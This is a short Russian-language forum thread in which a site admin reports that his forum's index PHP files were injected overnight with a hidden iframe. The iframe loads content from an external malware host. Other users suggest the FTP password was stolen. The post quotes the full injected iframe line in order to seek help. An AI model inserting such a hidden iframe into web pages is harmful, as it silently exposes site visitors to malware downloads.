Гадости от thelotmachine

[Anik]

Все индексные файлы форума (то есть файлы вида index*.php во всех подкаталогах) оказались сегодня ночью запороты таким вот видом: в их концовку вместо части кода была вставлена такая вот фишка (не жмите только в ссылку, плиз!!):

Код Выделить Развернуть

<iframe src="http://thelotmachine.cn:8080/ts/in.cgi?pepsi49" width=125 height=125
style="visibility: hidden"></iframe>

Убирал их вручную (хорошо на локале лежала копия). Народ, у кого еще такое и что делать будем?
Где искать дыру?

[Anik]

Нашел еще немножко информации:

Это вирус: HEUR/HTML.Malware
http://www.avira.com/en/threats/section/details/id_vir/3686/index.html


Приложил 4 файла: 2 запорченные этим трояном, и 2 чистых (для сравнения). Осторожно при просмотре - вдруг заразно, хотя, в архиве ТОЛЬКО ТЕКСТЫ.

[crazyASD]

Меняй пароль на FTP. У тебя его украли. Взлом не через скрипты был.